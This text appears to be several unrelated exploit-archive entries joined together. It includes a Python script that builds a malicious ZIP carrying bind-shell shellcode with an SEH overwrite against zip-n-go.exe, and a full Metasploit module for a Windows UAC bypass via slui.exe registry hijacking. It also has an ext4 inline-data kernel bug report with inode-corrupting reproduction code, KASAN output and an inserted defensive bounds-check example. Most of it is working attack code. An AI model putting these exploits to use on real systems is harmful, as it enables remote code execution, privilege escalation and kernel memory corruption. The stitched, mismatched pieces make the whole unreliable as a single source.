shellcode += "\x47\x72\x47\x70\x36\x71\x31\x4c\x6c\x49\x59\x76"
shellcode += "\x70\x6a\x74\x50\x31\x46\x61\x47\x45\x38\x4f\x32"
shellcode += "\x69\x4b\x54\x77\x35\x37\x79\x6f\x6a\x75\x66\x37"
shellcode += "\x51\x78\x4d\x67\x39\x79\x37\x48\x59\x6f\x39\x6f"
shellcode += "\x6a\x75\x62\x77\x61\x78\x43\x44\x68\x6c\x37\x4b"
shellcode += "\x68\x61\x69\x6f\x4a\x75\x70\x57\x5a\x37\x52\x48"
shellcode += "\x74\x35\x32\x4e\x52\x6d\x45\x31\x39\x6f\x4a\x75"
shellcode += "\x71\x78\x71\x73\x30\x6d\x32\x44\x65\x50\x4f\x79"
shellcode += "\x69\x73\x36\x37\x32\x77\x36\x37\x70\x31\x7a\x56"
shellcode += "\x51\x7a\x56\x72\x53\x69\x36\x36\x7a\x42\x49\x6d"
shellcode += "\x43\x56\x78\x47\x33\x74\x31\x34\x37\x4c\x67\x71"
shellcode += "\x46\x61\x6e\x6d\x53\x74\x34\x64\x62\x30\x6a\x66"
shellcode += "\x65\x50\x71\x54\x66\x34\x52\x70\x72\x76\x36\x36"
shellcode += "\x32\x76\x31\x56\x70\x56\x30\x4e\x53\x66\x52\x76"
shellcode += "\x31\x43\x32\x76\x52\x48\x64\x39\x38\x4c\x65\x6f"
shellcode += "\x4f\x76\x49\x6f\x78\x55\x4b\x39\x49\x70\x50\x4e"
shellcode += "\x53\x66\x31\x56\x79\x6f\x34\x70\x50\x68\x65\x58"
shellcode += "\x4e\x67\x57\x6d\x63\x50\x79\x6f\x38\x55\x4d\x6b"
shellcode += "\x68\x70\x78\x35\x6d\x72\x62\x76\x72\x48\x6d\x76"
shellcode += "\x4d\x45\x6f\x4d\x4f\x6d\x39\x6f\x4b\x65\x37\x4c"
shellcode += "\x77\x76\x71\x6c\x46\x6a\x6f\x70\x39\x6b\x4d\x30"
shellcode += "\x74\x35\x33\x35\x6f\x4b\x61\x57\x77\x63\x52\x52"
shellcode += "\x50\x6f\x32\x4a\x73\x30\x32\x73\x6b\x4f\x78\x55"
shellcode += "\x41\x41"

####################### ZIP File Structure ######################## 
###################################################################
######################## Local File Header ########################
LocalFileHeader  = '\x50\x4b\x03\x04' # local file header signature
LocalFileHeader += '\x14\x00'         # version needed to extract 0x14 = 20 -> 2.0
LocalFileHeader += '\x00\x00'         # general purpose bit flag
LocalFileHeader += '\x00\x00'         # compression method
LocalFileHeader += '\xb7\xac'         # file last modification time 0xacb7 -> H=21 M=37 S=23 -> 21:37:23
LocalFileHeader += '\xce\x34'         # file last modification date 0x34ce -> D=3 M=6 Y=2006 -> 2006/6/3
LocalFileHeader += '\x00\x00\x00'     # CRC-32 '\x00' was left out to make sure we hit 25 bytes before file length
LocalFileHeader += '\x00\x00\x00\x00' # compressed size
LocalFileHeader += '\x00\x00\x00\x00' # uncompressed size
LocalFileHeader += '\xe4\x0f'         # file name length 0x0fe4 = 4068 bytes 
LocalFileHeader += '\x00\x00'         # extra field length
LocalFileHeader += '\x00'             # file name
#LocalFileHeader += '\x00'             # extra field
################## Central Directory File Header ##################
CDFileHeader     = '\x50\x4b\x01\x02' # cd file header signature 
CDFileHeader    += '\x14\x00'         # version made by 0x14 = 20 -> 2.0
CDFileHeader    += '\x14\x00'         # version needed to extract 0x14 = 20 -> 2.0
CDFileHeader    += '\x00\x00'         # general purpose bit flag
CDFileHeader    += '\x00\x00'         # compression method 
CDFileHeader    += '\xb7\xac'         # file last modification time 0xacb7 -> H=21 M=37 S=23 -> 21:37:23
CDFileHeader    += '\xce\x34'         # file last modification date 0x34ce -> D=3 M=6 Y=2006 -> 2006/6/3
CDFileHeader    += '\x00\x00\x00\x00' # CRC-32
CDFileHeader    += '\x00\x00\x00\x00' # compressed size
CDFileHeader    += '\x00\x00\x00\x00' # uncompressed size
CDFileHeader    += '\xe4\x0f'         # file name length 0x0fe4 = 4068 bytes
CDFileHeader    += '\x00\x00'         # extra field length
CDFileHeader    += '\x00\x00'         # file comment length 
CDFileHeader    += '\x00\x00'         # disk number where file starts
CDFileHeader    += '\x01\x00'         # internal file attributes BIT 0: apparent ASCII/text file
CDFileHeader    += '\x24\x00\x00\x00' # external file attributes 
CDFileHeader    += '\x00\x00\x00\x00' # relative offset of local file header
#CDFileHeader    += '\x00'             # file name
#CDFileHeader    += '\x00'             # extra field 
#CDFileHeader    += '\x00'             # file comment 
################ End of Central Directory Record ##################
EOCDRHeader      = '\x50\x4b\x05\x06' # End of central directory signature
EOCDRHeader     += '\x00\x00'         # number of this disk 
EOCDRHeader     += '\x00\x00'         # disk where central directory starts 
EOCDRHeader     += '\x01\x00'         # number of central directory records on this disk 
EOCDRHeader     += '\x01\x00'         # total number of central directory records 
EOCDRHeader     += '\x12\x10\x00\x00' # size of central directory 0x1012 = 4114 bytes
EOCDRHeader     += '\x02\x10\x00\x00' # offset of start of central directory, relative to start of archive 
EOCDRHeader     += '\x00\x00'         # comment length 
#EOCDRHeader     += '\x00'             # comment 
 
Witchcraft  = '\x54'                      # PUSH ESP          * save stack pointer
Witchcraft += '\x5F'                      # POP EDI
Witchcraft += '\x54'                      # PUSH ESP          * calculate offset for decoder  
Witchcraft += '\x58'                      # POP EAX
Witchcraft += '\x05\x11\x21\x11\x11'      # ADD EAX,11112111
Witchcraft += '\x05\x11\x21\x11\x11'      # ADD EAX,11112111
Witchcraft += '\x2D\x53\x25\x22\x22'      # SUB EAX,22222553
Witchcraft += '\x50'                      # PUSH EAX
Witchcraft += '\x5C'                      # POP ESP

#https://github.com/ihack4falafel/Slink
#root@kali:/opt/Slink# python Slink.py                        * decode the following 'nop;mov esp, edi;mov eax, edi;add eax, 58c;jmp eax'
#Enter your shellcode: 9089FC89F8058C050000FFE0
#[+] Shellcode size is divisible by 4
#[+] Encoding [e0ff0000]..
#[!] [01] and/or [f] and/or [00] found, using alterantive encoder..
Witchcraft += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
Witchcraft += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
Witchcraft += "\x05\x11\x11\x77\x61" ## add  eax, 0x61771111
Witchcraft += "\x05\x11\x11\x66\x51" ## add  eax, 0x51661111
Witchcraft += "\x05\x11\x11\x55\x61" ## add  eax, 0x61551111
Witchcraft += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
Witchcraft += "\x50"                 ## push eax
#[+] Encoding [058c05f8]..
#[!] [01] and/or [f] and/or [00] found, using alterantive encoder..
Witchcraft += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
Witchcraft += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
Witchcraft += "\x05\x74\x13\x46\x13" ## add  eax, 0x13461374
Witchcraft += "\x05\x64\x13\x45\x13" ## add  eax, 0x13451364
Witchcraft += "\x05\x53\x12\x34\x12" ## add  eax, 0x12341253
Witchcraft += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
Witchcraft += "\x50"                 ## push eax
#[+] Encoding [89fc8990]..
#[!] [01] and/or [f] and/or [00] found, using alterantive encoder..
Witchcraft += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
Witchcraft += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
Witchcraft += "\x05\x41\x44\x76\x44" ## add  eax, 0x44764441
Witchcraft += "\x05\x41\x44\x65\x44" ## add  eax, 0x44654441
Witchcraft += "\x05\x41\x34\x54\x34" ## add  eax, 0x34543441
Witchcraft += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
Witchcraft += "\x50"                 ## push eax

Evil  = '\x41' * 3066                     # offset to shellcode 
Evil += shellcode                         # bind shell  
Evil += '\x43' * (716-len(shellcode))     # shellcode host
Evil += Witchcraft                        # magic! 
Evil += '\x42' * (126-len(Witchcraft))    # witchcraft host
Evil += '\x74\x80\x75\x80'                # nSEH - short jump backward (jump net)
Evil += '\x6e\x4c\x40\x00'                # SEH  - pop ecx, pop ebp, retn in zip-n-go.exe 
Evil += '\x41' * (4064-3908-4-4)
Evil += '.txt'

buffer  = LocalFileHeader
buffer += Evil
buffer += CDFileHeader
buffer += Evil
buffer += EOCDRHeader  

try:
	f=open("Evil.zip","w")
	print "[+] Creating %s bytes evil payload.." %len(Evil)
	f.write(buffer)
	f.close()
	print "[+] File created!"
except Exception as e:
	print e
            
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/exploit/exe'
require 'msf/core/exploit/powershell'

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Exploit::Powershell
  include Post::Windows::Priv
  include Post::Windows::Registry
  include Post::Windows::Runas

  SLUI_DEL_KEY          = "HKCU\\Software\\Classes\\exefile".freeze
  SLUI_WRITE_KEY        = "HKCU\\Software\\Classes\\exefile\\shell\\open\\command".freeze
  EXEC_REG_DELEGATE_VAL = 'DelegateExecute'.freeze
  EXEC_REG_VAL          = ''.freeze # This maps to "(Default)"
  EXEC_REG_VAL_TYPE     = 'REG_SZ'.freeze
  SLUI_PATH             = "%WINDIR%\\System32\\slui.exe".freeze
  CMD_MAX_LEN           = 16383

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name'          => 'Windows UAC Protection Bypass (Via Slui File Handler Hijack)',
        'Description'   => %q{
          This module will bypass UAC on Windows 8-10 by hijacking a special key in the Registry under
          the Current User hive, and inserting a custom command that will get invoked when any binary
          (.exe) application is launched. But slui.exe is an auto-elevated binary that is vulnerable
          to file handler hijacking. When we run slui.exe with changed Registry key
          (HKCU:\Software\Classes\exefile\shell\open\command), it will run our custom command as Admin
          instead of slui.exe.

          The module modifies the registry in order for this exploit to work. The modification is
          reverted once the exploitation attempt has finished.

          The module does not require the architecture of the payload to match the OS. If
          specifying EXE::Custom your DLL should call ExitProcess() after starting the
          payload in a different process.
        },
        'License'       => MSF_LICENSE,
        'Author'        => [
          'bytecode-77', # UAC bypass discovery and research
          'gushmazuko', # MSF & PowerShell module
        ],
        'Platform'      => ['win'],
        'SessionTypes'  => ['meterpreter'],
        'Targets'       => [
          ['Windows x86', { 'Arch' => ARCH_X86 }],
          ['Windows x64', { 'Arch' => ARCH_X64 }]
        ],
        'DefaultTarget' => 0,
        'References'    => [
          ['URL', 'https://github.com/bytecode-77/slui-file-handler-hijack-privilege-escalation'],
          ['URL', 'https://github.com/gushmazuko/WinBypass/blob/master/SluiHijackBypass.ps1']
        ],
        'DisclosureDate' => 'Jan 15 2018'
      )
    )
  end

  def check
    if sysinfo['OS'] =~ /Windows (8|10)/ && is_uac_enabled?
      CheckCode::Appears
    else
      CheckCode::Safe
    end
  end

  def exploit
    # Validate that we can actually do things before we bother
    # doing any more work
    check_permissions!

    commspec = 'powershell'
    registry_view = REGISTRY_VIEW_NATIVE
    psh_path = "%WINDIR%\\System32\\WindowsPowershell\\v1.0\\powershell.exe"

    # Make sure we have a sane payload configuration
    if sysinfo['Architecture'] == ARCH_X64
      if session.arch == ARCH_X86
        # On x64, check arch
        commspec = '%WINDIR%\\Sysnative\\cmd.exe /c powershell'
        if target_arch.first == ARCH_X64
          # We can't use absolute path here as
          # %WINDIR%\\System32 is always converted into %WINDIR%\\SysWOW64 from a x86 session
          psh_path = "powershell.exe"
        end
      end
      if target_arch.first == ARCH_X86
        # Invoking x86, so switch to SysWOW64
        psh_path = "%WINDIR%\\SysWOW64\\WindowsPowershell\\v1.0\\powershell.exe"
      end
    else
      # if we're on x86, we can't handle x64 payloads
      if target_arch.first == ARCH_X64
        fail_with(Failure::BadConfig, 'x64 Target Selected for x86 System')
      end
    end

    if !payload.arch.empty? && (payload.arch.first != target_arch.first)
      fail_with(Failure::BadConfig, 'payload and target should use the same architecture')
    end

    case get_uac_level
    when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
      UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
      UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
      fail_with(Failure::NotVulnerable,
                "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")
    when UAC_DEFAULT
      print_good('UAC is set to Default')
      print_good('BypassUAC can bypass this setting, continuing...')
    when UAC_NO_PROMPT
      print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
      shell_execute_exe
      return
    end

    payload_value = rand_text_alpha(8)
    psh_path = expand_path(psh_path)

    template_path = Rex::Powershell::Templates::TEMPLATE_DIR
    psh_payload = Rex::Powershell::Payload.to_win32pe_psh_net(template_path, payload.encoded)

    if psh_payload.length > CMD_MAX_LEN
      fail_with(Failure::None, "Payload size should be smaller than #{CMD_MAX_LEN} (actual size: #{psh_payload.length})")
    end

    psh_stager = "\"IEX (Get-ItemProperty -Path #{SLUI_WRITE_KEY.gsub('HKCU', 'HKCU:')} -Name #{payload_value}).#{payload_value}\""
    cmd = "#{psh_path} -nop -w hidden -c #{psh_stager}"

    existing = registry_getvaldata(SLUI_WRITE_KEY, EXEC_REG_VAL, registry_view) || ""
    exist_delegate = !registry_getvaldata(SLUI_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view).nil?

    if existing.empty?
      registry_createkey(SLUI_WRITE_KEY, registry_view)
    end

    print_status("Configuring payload and stager registry keys ...")
    unless exist_delegate
      registry_setvaldata(SLUI_WRITE_KEY, EXEC_REG_DELEGATE_VAL, '', EXEC_REG_VAL_TYPE, registry_view)
    end

    registry_setvaldata(SLUI_WRITE_KEY, EXEC_REG_VAL, cmd, EXEC_REG_VAL_TYPE, registry_view)
    registry_setvaldata(SLUI_WRITE_KEY, payload_value, psh_payload, EXEC_REG_VAL_TYPE, registry_view)

    # Calling slui.exe through cmd.exe allows us to launch it from either an x86 or an x64 session arch.
    cmd_path = expand_path(commspec)
    cmd_args = expand_path("Start-Process #{SLUI_PATH} -Verb runas")
    print_status("Executing payload: #{cmd_path} #{cmd_args}")

    # We can't use cmd_exec here because it blocks, waiting for a result.
    client.sys.process.execute(cmd_path, cmd_args, 'Hidden' => true)

    # Wait a couple of seconds to give the payload a chance to fire before cleaning up
    # TODO: fix this up to use something smarter than a timeout?
    sleep(3)

    handler(client)

    print_status("Cleaning up ...")
    unless exist_delegate
      registry_deleteval(SLUI_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view)
    end
    if existing.empty?
      registry_deletekey(SLUI_DEL_KEY, registry_view)
    else
      registry_setvaldata(SLUI_WRITE_KEY, EXEC_REG_VAL, existing, EXEC_REG_VAL_TYPE, registry_view)
    end
    registry_deleteval(SLUI_WRITE_KEY, payload_value, registry_view)
  end

  def check_permissions!
    unless check == Exploit::CheckCode::Appears
      fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
    end
    fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
    # Check if you are an admin
    # is_in_admin_group can be nil, true, or false
    print_status('UAC is Enabled, checking level...')
    vprint_status('Checking admin status...')
    admin_group = is_in_admin_group?
    if admin_group.nil?
      print_error('Either whoami is not there or failed to execute')
      print_error('Continuing under assumption you already checked...')
    else
      if admin_group
        print_good('Part of Administrators group! Continuing...')
      else
        fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
      end
    end

    if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
      fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
    end
  end
end
            
ext4 can store data for small regular files as "inline data", meaning that the
data is stored inside the corresponding inode instead of in separate blocks.
Inline data is stored in two places: The first 60 bytes go in the i_block field
in the inode (which normally contains a list of blocks instead), the rest goes
in the special filesystem-internal extended attribute "system.data".

Since commit e50e5129f384 ("ext4: xattr-in-inode support", in v4.13+), ext4 can
store extended attribute values not only inline in the inode, but can also store
such values in dedicated inodes.

When a corrupted filesystem stores the system.data extended attribute value in a
dedicated inode, the kernel still treats it as inline data and trusts its length
field, causing memory corruption.



ext4_find_inline_data_nolock() attempts to locate an inode's inline data by
searching for the system.data xattr using ext4_xattr_ibody_find().
If the inode has xattrs, ext4_xattr_ibody_find() first checks them for
corruption using xattr_check_inode(), then grabs the wanted xattr using
xattr_find_entry().
xattr_check_inode() uses ext4_xattr_check_entries() to check the individual
xattrs, but skips most checks if `entry->e_value_inum != 0` (marking an xattr
whose value is in a dedicated inode) - only for inline values, length and offset
checks are performed to ensure that the value actually fits into the inode.
The problem is that ext4_find_inline_data_nolock() then assumes that the
returned xattr uses inline storage and that the returned length will fit into
the inode; it stores the length field from the xattr in
`EXT4_I(inode)->i_inline_size` without further checks.

Later, when the file is read, ext4_read_inline_data() trusts this length value,
causing an out-of-bounds memcpy() in the following line:

    memcpy(buffer,
           (void *)IFIRST(header) + le16_to_cpu(entry->e_value_offs), len);
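As an added illustration (not code from the report or the kernel), a user-space version of the system.data lookup with the two checks a hardened ext4_find_inline_data_nolock() needs: reject an entry whose e_value_inum is non-zero, and bound e_value_offs/e_value_size by the in-inode xattr area. The inode layout follows the report's fixup.c; find_inline_data_size() and build_sample_inode() are hypothetical names, and the 256-byte inode is constructed in memory rather than read from an image.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Layout constants taken from the report's fixup.c plus the kernel's 4-byte xattr name padding. */
#define INODE_SIZE              256
#define GOOD_OLD_INODE          128          /* i_extra_isize sits right after the 128-byte base inode */
#define EXT4_XATTR_MAGIC        0xEA020000u
#define EXT4_XATTR_INDEX_SYSTEM 7            /* "system." namespace: idx=7 name='data' in the fixup output */
#define ROUND_UP(x, r)          (((x) + ((r) - 1)) & ~((r) - 1))

struct ext4_xattr_ibody_header { uint32_t h_magic; };
struct ext4_xattr_entry {
  uint8_t  e_name_len;
  uint8_t  e_name_index;
  uint16_t e_value_offs;   /* offset of an in-inode value, relative to IFIRST(header) */
  uint32_t e_value_inum;   /* non-zero: the value lives in a dedicated inode, not in here */
  uint32_t e_value_size;
  uint32_t e_hash;
};

enum { INLINE_OK = 0, INLINE_NOT_FOUND = -1, INLINE_CORRUPT = -2 };

/* Locate system.data in the in-inode xattr area and hand back its size only if the
 * value really is stored inline and fits before the end of the inode.
 * Little-endian host assumed, as in the report's fixup.c (hypothetical helper). */
int find_inline_data_size(const uint8_t *inode, size_t inode_size, uint32_t *size_out)
{
  uint16_t extra_isize;
  if (inode_size < GOOD_OLD_INODE + sizeof extra_isize) return INLINE_CORRUPT;
  memcpy(&extra_isize, inode + GOOD_OLD_INODE, sizeof extra_isize);

  size_t hdr_off = GOOD_OLD_INODE + extra_isize;
  if (hdr_off + sizeof(struct ext4_xattr_ibody_header) > inode_size) return INLINE_CORRUPT;

  uint32_t magic;
  memcpy(&magic, inode + hdr_off, sizeof magic);
  if (magic != EXT4_XATTR_MAGIC) return INLINE_NOT_FOUND;   /* no in-inode xattrs at all */

  size_t first = hdr_off + sizeof(struct ext4_xattr_ibody_header); /* IFIRST(header) */
  size_t space = inode_size - first;   /* bytes available for entries and inline values */

  size_t off = first;
  while (off + sizeof(struct ext4_xattr_entry) <= inode_size) {
    uint32_t head;
    memcpy(&head, inode + off, sizeof head);
    if (head == 0) break;                            /* IS_LAST_ENTRY: all-zero terminator */
    struct ext4_xattr_entry e;
    memcpy(&e, inode + off, sizeof e);

    size_t name_off = off + sizeof e;
    size_t next_off = name_off + ROUND_UP((size_t)e.e_name_len, 4);
    if (next_off > inode_size) return INLINE_CORRUPT;  /* entry runs off the inode */

    if (e.e_name_index == EXT4_XATTR_INDEX_SYSTEM && e.e_name_len == 4 &&
        memcmp(inode + name_off, "data", 4) == 0) {
      /* The check the report says is missing: inline data must never use an external value inode. */
      if (e.e_value_inum != 0) return INLINE_CORRUPT;
      /* The inline bounds check: offset and length must stay inside the in-inode xattr area. */
      if (e.e_value_offs > space || e.e_value_size > space - e.e_value_offs) return INLINE_CORRUPT;
      *size_out = e.e_value_size;
      return INLINE_OK;
    }
    off = next_off;
  }
  return INLINE_NOT_FOUND;
}

/* Build a constructed 256-byte inode carrying one system.data entry (test data, not a real image). */
void build_sample_inode(uint8_t *inode, uint32_t value_inum, uint16_t value_offs, uint32_t value_size)
{
  memset(inode, 0, INODE_SIZE);
  uint16_t extra_isize = 32;                        /* i_extra_isize = 32, as in the fixup output */
  memcpy(inode + GOOD_OLD_INODE, &extra_isize, sizeof extra_isize);
  uint32_t magic = EXT4_XATTR_MAGIC;
  memcpy(inode + GOOD_OLD_INODE + extra_isize, &magic, sizeof magic);
  struct ext4_xattr_entry e = { 4, EXT4_XATTR_INDEX_SYSTEM, value_offs, value_inum, value_size, 0 };
  uint8_t *entry = inode + GOOD_OLD_INODE + extra_isize + sizeof magic;
  memcpy(entry, &e, sizeof e);
  memcpy(entry + sizeof e, "data", 4);              /* zeroed bytes after the name act as the terminator */
}

int main(void)
{
  uint8_t inode[INODE_SIZE];
  uint32_t size = 0;
  build_sample_inode(inode, 0, 76, 15);      /* healthy: offs=76 inum=0 size=15 from the fixup output */
  printf("healthy inode:   rc=%d size=%u\n", find_inline_data_size(inode, INODE_SIZE, &size), size);
  build_sample_inode(inode, 20, 0, 60000);   /* corrupted exactly the way fixup.c rewrites the entry */
  printf("corrupted inode: rc=%d\n", find_inline_data_size(inode, INODE_SIZE, &size));
  return 0;
}
```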



To reproduce, on a system with kernel v4.13 or newer, ideally with KASAN on:

1. Create a new ext4 filesystem image, with 256-byte inodes and inline data
support:

    $ mkfs.ext4 -b 4096 -I 256 -O inline_data testfs.img 400k
    mke2fs 1.43.7 (16-Oct-2017)
    Creating regular file testfs.img

    Filesystem too small for a journal
    Creating filesystem with 100 4k blocks and 64 inodes

    Allocating group tables: done                            
    Writing inode tables: done                            
    Writing superblocks and filesystem accounting information: done

2. Create a 75-byte file in the new filesystem:

    $ mkdir mount
    $ sudo mount testfs.img mount
    $ sudo dd bs=75 count=1 if=/dev/zero of=mount/testfile
    1+0 records in
    1+0 records out
    75 bytes copied, 0.000811554 s, 92.4 kB/s
    $ sudo umount mount

3. Bump up the inode size, bump up the xattr size, and mark the xattr value as
   non-inline:

    $ cat fixup.c
    #include <stdint.h>
    #include <fcntl.h>
    #include <err.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <sys/mman.h>
    #include <sys/stat.h>

    #define __le16 uint16_t
    #define __le32 uint32_t
    #define __u16 uint16_t
    #define __u32 uint32_t
    #define __u8 uint8_t

    /* some definitions from kernel headers */
    #define EXT4_NDIR_BLOCKS    12
    #define EXT4_IND_BLOCK      EXT4_NDIR_BLOCKS
    #define EXT4_DIND_BLOCK     (EXT4_IND_BLOCK + 1)
    #define EXT4_TIND_BLOCK     (EXT4_DIND_BLOCK + 1)
    #define EXT4_N_BLOCKS       (EXT4_TIND_BLOCK + 1)
    #define EXT4_XATTR_MAGIC    0xEA020000
    struct ext4_inode {
      __le16  i_mode;
      __le16  i_uid;
      __le32  i_size_lo;
      __le32  i_atime;
      __le32  i_ctime;
      __le32  i_mtime;
      __le32  i_dtime;
      __le16  i_gid;
      __le16  i_links_count;
      __le32  i_blocks_lo;
      __le32  i_flags;
      union {
        struct {
          __le32  l_i_version;
        } linux1;
      } osd1;
      __le32  i_block[EXT4_N_BLOCKS];
      __le32  i_generation;
      __le32  i_file_acl_lo;
      __le32  i_size_high;
      __le32  i_obso_faddr;
      union {
        struct {
          __le16  l_i_blocks_high;
          __le16  l_i_file_acl_high;
          __le16  l_i_uid_high;
          __le16  l_i_gid_high;
          __le16  l_i_checksum_lo;
          __le16  l_i_reserved;
        } linux2;
      } osd2;
      __le16  i_extra_isize;
      __le16  i_checksum_hi;
      __le32  i_ctime_extra;
      __le32  i_mtime_extra;
      __le32  i_atime_extra;
      __le32  i_crtime;
      __le32  i_crtime_extra;
      __le32  i_version_hi;
      __le32  i_projid;
    };
    struct ext4_xattr_ibody_header {
      __le32  h_magic;
    };
    struct ext4_xattr_entry {
      __u8  e_name_len;
      __u8  e_name_index;
      __le16  e_value_offs;
      __le32  e_value_inum;
      __le32  e_value_size;
      __le32  e_hash;
      char  e_name[0];
    };

    #define INODE_SIZE 256

    #define ROUND_UP(x,round) ( ((x)+((round)-1)) & ~((round)-1) )

    int main(int argc, char **argv) {
      char *path = argv[1];
      int fd = open(path, O_RDWR);
      if (fd == -1) err(1, "open");
      struct stat st;
      if (fstat(fd, &st)) err(1, "fstat");
      char *map = mmap(NULL, st.st_size, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
      if (map == MAP_FAILED) err(1, "mmap");
      for (int i=0; i<st.st_size/INODE_SIZE; i++) {
        struct ext4_inode *ino = (void*)(map + i * INODE_SIZE);
        if (ino->i_links_count != 1 || ino->i_size_lo != 75) continue;
        printf("found inode (idx=%d, size=%u, mode=%ho)\n",
               i, ino->i_size_lo, ino->i_mode);
        ino->i_size_lo = 60000;
        printf("  i_extra_isize = %hu\n", ino->i_extra_isize);
        struct ext4_xattr_ibody_header *hdr =
            (void*)( ((char*)ino)+128+ino->i_extra_isize );
        if (hdr->h_magic != EXT4_XATTR_MAGIC) continue;
        struct ext4_xattr_entry *entry = (void*)(hdr+1);
        while (*(uint32_t*)entry != 0) {
          printf("  attr: idx=%hhu name='%.*s' offs=%hu inum=%u size=%u\n",
              entry->e_name_index, entry->e_name_len, entry->e_name,
              entry->e_value_offs, entry->e_value_inum, entry->e_value_size);
          entry->e_value_offs = 0;
          entry->e_value_inum = 20;
          entry->e_value_size = 60000;
          entry = (void*)(
              (char*)entry + sizeof(*entry) + ROUND_UP(entry->e_name_len, 4)
          );
        }
      }
    }
    $ gcc -o fixup fixup.c -Wall
    $ ./fixup testfs.img
    found inode (idx=555, size=75, mode=100644)
      i_extra_isize = 32
      attr: idx=7 name='data' offs=76 inum=0 size=15

4. Use fsck to fix up the inode checksum (but don't let it fix anything else!):

    $ fsck.ext4 -f testfs.img
    e2fsck 1.43.7 (16-Oct-2017)
    Pass 1: Checking inodes, blocks, and sizes
    Inode 12 has INLINE_DATA_FL flag but extended attribute not found.  Truncate<y>? no
    Extended attribute in inode 12 has a value size (60000) which is invalid
    Clear<y>? no
    Inode 12 passes checks, but checksum does not match inode.  Fix<y>? yes
    Pass 2: Checking directory structure
    Pass 3: Checking directory connectivity
    Pass 4: Checking reference counts
    Pass 5: Checking group summary information

    testfs.img: ***** FILE SYSTEM WAS MODIFIED *****

    testfs.img: ********** WARNING: Filesystem still has errors **********

    testfs.img: 12/64 files (0.0% non-contiguous), 13/100 blocks

5. Mount the filesystem again:

    $ sudo mount testfs.img mount

6. Read the file:

    $ hexdump -C mount/testfile
    00000000  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
    *
    00000030  00 00 00 00 00 00 00 00  00 00 00 00 04 07 00 00  |................|
    00000040  14 00 00 00 60 ea 00 00  00 00 00 00 64 61 74 61  |....`.......data|
    00000050  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
    *
    000004a0  31 00 00 00 00 00 00 00  e0 d1 fc 98 d7 7f 00 00  |1...............|
    000004b0  e0 07 03 99 d7 7f 00 00  00 00 00 00 00 00 00 00  |................|
    000004c0  00 00 00 00 00 00 00 00  e0 5f 00 00 00 00 00 00  |........._......|
    000004d0  64 00 00 00 00 00 00 00  f0 af 02 99 d7 7f 00 00  |d...............|
    000004e0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
    [...]

7. Check dmesg:

    $ dmesg
    [...]
    [ 3211.552729] ==================================================================
    [ 3211.552782] BUG: KASAN: use-after-free in ext4_read_inline_data+0x114/0x120 [ext4]
    [ 3211.552787] Write of size 59940 at addr ffff8802ba1d003c by task pool/12922

    [ 3211.552796] CPU: 3 PID: 12922 Comm: pool Not tainted 4.17.0-rc4+ #7
    [ 3211.552798] Hardware name: LENOVO 20FCS12V06/20FCS12V06, BIOS N1FET43W (1.17 ) 08/02/2016
    [ 3211.552799] Call Trace:
    [ 3211.552807]  dump_stack+0x71/0xab
    [ 3211.552813]  print_address_description+0x6a/0x250
    [ 3211.552817]  kasan_report+0x258/0x380
    [ 3211.552863]  ? ext4_read_inline_data+0x114/0x120 [ext4]
    [ 3211.552867]  memcpy+0x34/0x50
    [ 3211.552914]  ext4_read_inline_data+0x114/0x120 [ext4]
    [ 3211.552961]  ext4_read_inline_page+0x1e4/0x2a0 [ext4]
    [ 3211.553006]  ? ext4_read_inline_data+0x120/0x120 [ext4]
    [ 3211.553053]  ext4_readpage_inline+0x13e/0x160 [ext4]
    [ 3211.553101]  ext4_readpage+0xf5/0x110 [ext4]
    [ 3211.553106]  generic_file_read_iter+0x9a4/0xea0
    [ 3211.553112]  ? filemap_range_has_page+0x160/0x160
    [ 3211.553116]  ? save_stack+0x89/0xb0
    [ 3211.553120]  ? __kasan_slab_free+0x105/0x150
    [ 3211.553124]  ? aa_path_link+0x1f0/0x1f0
    [ 3211.553128]  ? do_syscall_64+0x150/0x160
    [ 3211.553132]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
    [ 3211.553137]  ? audit_watch_compare+0x1b/0x50
    [ 3211.553142]  __vfs_read+0x239/0x340
    [ 3211.553145]  ? __x64_sys_copy_file_range+0x2d0/0x2d0
    [ 3211.553149]  ? dput.part.19+0x2e/0x1b0
    [ 3211.553154]  ? auditd_test_task+0x43/0x60
    [ 3211.553158]  vfs_read+0xa5/0x190
    [ 3211.553162]  ksys_read+0xa1/0x120
    [ 3211.553166]  ? kernel_write+0xa0/0xa0
    [ 3211.553171]  do_syscall_64+0x6d/0x160
    [ 3211.553175]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
    [ 3211.553178] RIP: 0033:0x7f9ada1af72c
    [ 3211.553180] RSP: 002b:00007f9ac2258888 EFLAGS: 00000246 ORIG_RAX: 0000000000000000
    [...]
    [ 3211.553197] The buggy address belongs to the page:
